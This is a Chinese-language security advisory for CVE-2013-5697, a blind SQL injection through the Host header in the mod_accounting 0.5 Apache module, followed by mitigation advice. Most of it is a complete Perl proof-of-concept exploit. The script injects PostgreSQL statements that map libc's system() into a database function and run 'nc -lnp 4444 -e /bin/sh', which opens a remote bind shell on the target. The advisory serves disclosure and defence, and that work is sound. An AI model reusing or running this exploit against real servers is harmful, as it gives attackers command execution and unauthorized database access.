accounting'模块SQL注入漏洞(CVE

发布日期：2013-09-26
更新日期：2013-10-08

受影响系统：
mod_accounting mod_accounting 0.5
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 62677
CVE ID: CVE-2013-5697

mod_accounting是Apache 1.3.x上的流量计费模块，该模块使用数据记录流量，支持的数据库类型包括MySQL及PostgreSQL。

mod_accounting 0.5模块在Host报文头中存在SQL注入漏洞，攻击者可利用此漏洞破坏应用，执行未授权数据库操作。该漏洞源于用户提供的HTTP报文头未经过滤即用在查询内。该模块使用了简单的字符串串联来修改已定义查询内的占位符，然后再发送到数据库内。该代码位于mod_accounting.c内。

<*来源：Wire Ghoul
 
  链接：
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl
# PoC of blind SQL injection in the mod_accounting/0.5 Apache module
# Injection can occur via the Host header
# As the injection occurs in a user defined insert statement a bit of trial
and error is required
# Database operations occurs asyncronous to page response so timing attacks
wont work
# This one is completely blind
# DB can be mysql or postgres, this PoC only covers postgres
# PoC executes netcat to listen on port 4444 (requires dba privileges)
use IO::Socket::INET;

print "#----------------------------------------------#\n";
print "| mod_accounting/0.5 PoC exploit by \ () Wireghoul |\n";
print "|                    |\n";
print "#----------Command execution via SQLi----------#\n";
print "[*] Enumerating blind injection vectors:\n";

my @endings = ("'));", '"));', "));", "');", '");', ");", "';", '";',";");
# These should terminate most insert statements
#my @endings = ( "');" );
my $shell = 'nc -lnp 4444 -e /bin/sh';
my $cnt = 0;
my $content = "CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS
'/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; SELECT system('$shell');";
foreach $end (@endings) {
  $cnt++;
  my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to
connect to $ARGV[0]:$ARGV[1]: $!\n";
  my $str = "GET / HTTP/1.1\r\nHost: $ARGV[0]$cnt$end $content --
\r\n\r\n"; # from mysql.user into outfile '/tmp/pocpoc$cnt.txt'; --
\r\n\r\n";
  print "[-] Trying $end\n";
  print $sock $str;
  #print "Sent $end\n";
  close ($sock);
}
print "[*] Done, remote server should have executed $shell\n";

建议：
--------------------------------------------------------------------------------
临时解决方法：

该模块已经不再提供支持，可以根据需要，停止使用该模块。

厂商补丁：

mod_accounting
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：